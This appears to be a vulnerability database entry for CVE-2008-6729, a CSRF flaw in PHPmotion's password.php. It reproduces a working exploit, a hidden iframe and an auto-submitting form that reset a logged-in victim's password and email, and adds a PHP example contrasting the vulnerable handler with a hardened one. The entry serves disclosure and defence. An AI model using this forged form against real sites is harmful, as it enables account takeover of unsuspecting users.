PHPmotion 'password.php' multiple cross-site request forgery vulnerabilities

Vulnerability ID 1117125 Vulnerability type Cross-site request forgery
Published 2008-12-23 Updated 2009-04-20
CVE ID CVE-2008-6729 CNNVD ID CNNVD-200904-380
Platform PHP CVSS score 6.8
|Vulnerability sources
https://www.exploit-db.com/exploits/7557
https://www.securityfocus.com/bid/84501
https://cxsecurity.com/issue/WLB-2009040209
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-380
|Vulnerability details
Multiple cross-site request forgery (CSRF) vulnerabilities in password.php in PHPmotion 2.1 and earlier allow remote attackers to hijack the authentication of arbitrary users for requests that modify an account, via the password or email_address parameters. Because the form that changes a member's password and e-mail address is accepted on the strength of the session cookie alone, with no anti-CSRF token and no re-entry of the current password, any page the victim visits while logged in can submit it on their behalf.
|Vulnerability EXP
PHPmotion <= 2.1 CSRF vulnerability

Author: Ausome1
Email: Ausorme1@gmail.com
Website: http://www.enigmagroup.org
Description: Change a member's password and/or email.
---------------------------------------------------------------------------------------------------


Social engineer a PHPMotion member to come to your web page with the following hidden iframe on 
it, which pulls in the evil script from pwned.html. This will change the victim's password and email, 
using their credentials.

We use a hidden iframe so the victim doesn't know their password was changed until it's too late. In 
the pwned.html file I recreated the form on the PHPMotion change password/email page. JavaScript is used 
to submit the form on page load.

Hidden iframe code:

	<iframe id="hiframe" style="visibility:hidden;display:none" src="pwned.html"></iframe>


Source of pwned.html file:

	<html>
	<head></head>
	<!-- Submit the forged request as soon as the page loads inside the hidden iframe -->
	<body onload="document.forms.invite.submit();">
	<!-- Same field names as the real PHPMotion change password/email form; the victim's browser attaches their session cookie -->
	<form name="invite" action="http://demo.phpmotiontemplates.com/v2/default/password.php" method="post" class="UpdateProfileForm">
		<input type="hidden" name="submitted" value="yes" />
		<input type="password" name="password" value="password123" />
		<input type="text" name="email_address" size="36" value="NotYourEmail@anymore.com" />
		<input type="submit" value="Update settings" name="invite_fr" />
	</form>
	</body>
	</html>


Once your victim has visited your evil page, you may now be able to log into their PHPMotion account 
using the password "password123", and their email will be "NotYourEmail@anymore.com".

# milw0rm.com [2008-12-23]
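To make concrete what the exploit above relies on and what a fixed password.php has to check, here is an added PHP example written for this page; it is not PHPmotion's code. `vulnerable_update_account()` accepts any POST that carries `submitted=yes` from a logged-in session, which is exactly what the hidden form exercises. `hardened_update_account()` adds a per-session synchronizer token, an Origin/Referer host check, and re-authentication with the current password before writing. The `members` table and its columns, `SITE_HOST`, the attacker hostname and the sample passwords are assumptions; the demo runs against an in-memory SQLite table so it needs no PHPmotion install.

```php
<?php
// Added example, not PHPmotion's own code: a minimal password.php-style
// handler in the unprotected shape the exploit relies on, beside a hardened
// version. Table/column names, SITE_HOST and the attacker hostname are
// assumptions made for this demo.
declare(strict_types=1);

const SITE_HOST = 'demo.phpmotiontemplates.com'; // assumed host of the real form

// Unprotected handler: any POST carrying submitted=yes plus the victim's
// session cookie updates the account. Nothing proves the request came from
// a page the victim actually loaded, which is what pwned.html abuses.
function vulnerable_update_account(array $post, array $session, PDO $db): bool
{
    if (($post['submitted'] ?? '') !== 'yes' || empty($session['user_id'])) {
        return false;
    }
    $stmt = $db->prepare('UPDATE members SET password = ?, email_address = ? WHERE id = ?');
    return $stmt->execute([
        password_hash((string) $post['password'], PASSWORD_DEFAULT),
        (string) $post['email_address'],
        $session['user_id'],
    ]);
}

// Mint one synchronizer token per session when rendering the settings form
// and embed it as a hidden field. A cross-site page cannot read it, so a
// forged form cannot carry a valid value.
function issue_csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

// Hardened handler: token check, Origin/Referer check, and re-authentication
// with the current password before anything is written.
function hardened_update_account(array $post, array $server, array $session, PDO $db): bool
{
    if (($post['submitted'] ?? '') !== 'yes' || empty($session['user_id'])) {
        return false;
    }
    // 1. Synchronizer token, compared in constant time against the session copy.
    $token = (string) ($post['csrf_token'] ?? '');
    if (empty($session['csrf_token']) || !hash_equals($session['csrf_token'], $token)) {
        return false;
    }
    // 2. Defence in depth: a cross-site POST names the attacker's site in
    //    Origin (or Referer); reject any value that is not our own host.
    $origin = $server['HTTP_ORIGIN'] ?? $server['HTTP_REFERER'] ?? '';
    if ($origin !== '' && parse_url($origin, PHP_URL_HOST) !== SITE_HOST) {
        return false;
    }
    // 3. Changing the password or e-mail requires the current password,
    //    which a CSRF page does not know even if the other checks were bypassed.
    $stmt = $db->prepare('SELECT password FROM members WHERE id = ?');
    $stmt->execute([$session['user_id']]);
    $hash = $stmt->fetchColumn();
    if ($hash === false || !password_verify((string) ($post['current_password'] ?? ''), $hash)) {
        return false;
    }
    $stmt = $db->prepare('UPDATE members SET password = ?, email_address = ? WHERE id = ?');
    return $stmt->execute([
        password_hash((string) $post['password'], PASSWORD_DEFAULT),
        (string) $post['email_address'],
        $session['user_id'],
    ]);
}

// Demo against an in-memory SQLite table (constructed data).
$db = new PDO('sqlite::memory:');
$db->exec('CREATE TABLE members (id INTEGER PRIMARY KEY, password TEXT, email_address TEXT)');
$db->prepare('INSERT INTO members VALUES (1, ?, ?)')
   ->execute([password_hash('victim-secret', PASSWORD_DEFAULT), 'victim@example.com']);

$session = ['user_id' => 1];   // the victim is logged in
$token   = issue_csrf_token($session);

// Exactly the fields pwned.html posts; the browser adds the cookie, and the
// Origin header names the attacker's page (assumed hostname).
$forged = ['submitted' => 'yes', 'password' => 'password123', 'email_address' => 'NotYourEmail@anymore.com'];
$evil   = ['HTTP_ORIGIN' => 'http://attacker.example'];

// The victim's own submission from the genuine settings page.
$legit = $forged + ['csrf_token' => $token, 'current_password' => 'victim-secret'];
$legit['password'] = 'new-secret';
$ours  = ['HTTP_ORIGIN' => 'http://' . SITE_HOST];

printf("hardened, forged POST:   %s\n", hardened_update_account($forged, $evil, $session, $db) ? 'changed' : 'rejected');
printf("hardened, genuine POST:  %s\n", hardened_update_account($legit, $ours, $session, $db) ? 'changed' : 'rejected');
printf("vulnerable, forged POST: %s\n", vulnerable_update_account($forged, $session, $db) ? 'changed' : 'rejected');
```

Run it with `php` on a build that has pdo_sqlite. The token check alone is enough to defeat the hidden-iframe form, since a page on another origin can neither read the victim's token nor guess a 256-bit random value; the Origin check and the current-password requirement are there so that a single missed token on one form, or a token leaked through some other bug, does not by itself hand over the account.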
|Affected products
PHPmotion 2.1
PHPmotion 2.0
PHPmotion 1.0
|References

Source: XF
Name: phpmotion-password-csrf(47585)
Link: http://xforce.iss.net/xforce/xfdb/47585
Source: MILW0RM
Name: 7557
Link: http://www.milw0rm.com/exploits/7557
Source: SECUNIA
Name: 33309
Link: http://secunia.com/advisories/33309
Source: OSVDB
Name: 50999
Link: http://osvdb.org/50999